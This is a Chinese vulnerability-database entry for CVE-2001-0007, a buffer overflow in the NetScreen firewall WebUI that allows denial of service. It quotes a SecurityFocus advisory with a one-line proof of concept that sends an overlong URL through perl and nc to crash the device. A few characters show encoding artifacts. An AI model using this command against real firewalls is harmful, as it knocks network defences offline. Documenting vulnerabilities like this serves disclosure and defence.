NetScreen防火墙WebUI缓冲区溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1106157 漏洞类型 缓冲区溢出
发布时间 2001-01-08 更新时间 2005-08-17
CVE编号 CVE-2001-0007 CNNVD-ID CNNVD-200102-006
漏洞平台 SCO CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/20532
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200102-006
|漏洞详情
NetScreen防火墙WebUI存在缓冲区溢出漏洞。远程攻击者可以借助对web管理接口的超长URL请求导致服务拒绝。
|漏洞EXP
source: http://www.securityfocus.com/bid/2176/info

NetScreen Firewall is a network appliance used to secure against intruders and various types of attacks to a network. NetScreen has a Web administrative Interface (WebUI) used to configure and set the firewall settings.

It is possible to cause a denial of service in NetScreen Firewall. Requesting an unusually long URL to WebUI listening on default port 80, will cause the firewall to crash. A restart of the service is required in order to gain normal functionality. 

Once the input URL is longer than 1220 bytes=A3=ACNetScreen firewall= will crash:

$echo -e "GET /`perl -e 'print "A"x1220'` HTTP/1.0\n\n"|nc= netscreen_firewall 80
|参考资料

来源:BID
名称:2176
链接:http://www.securityfocus.com/bid/2176
来源:BUGTRAQ
名称:20010109NSFOCUSSA2001-01:NetScreenFirewallWebUIBufferOverflowvulnerability
链接:http://www.securityfocus.com/archive/1/155149
来源:XF
名称:netscreen-webui-bo(5908)
链接:http://xforce.iss.net/static/5908.php
来源:OSVDB
名称:1707
链接:http://www.osvdb.org/1707